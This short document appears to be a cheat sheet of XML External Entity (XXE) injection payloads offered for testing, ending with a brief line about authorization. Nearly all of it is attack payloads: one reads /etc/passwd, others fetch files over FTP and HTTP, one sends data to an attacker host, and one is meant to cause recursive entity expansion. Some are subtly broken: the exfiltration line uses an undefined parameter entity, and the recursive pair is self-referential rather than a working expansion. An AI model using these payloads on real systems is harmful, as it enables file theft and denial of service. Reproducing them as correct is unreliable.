Here are some common XXE payloads that can be used to test for XXE-
- Basic payload:
<!DOCTYPE replace [<!ENTITY example "Hello World">]>
- Retrieving sensitive files:
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>
- Retrieving files via FTP:
<!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]>
- Retrieving files via HTTP:
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]>
- Sending data to a remote server:
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]>
- Recursive payload:
<!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]>
These payloads are just a few examples, and the specific payload you use will depend on the target application and the data you’re trying to retrieve or manipulate. It’s important to note that XXE injection can be a dangerous vulnerability and should only be used in controlled environments with proper authorization and consent.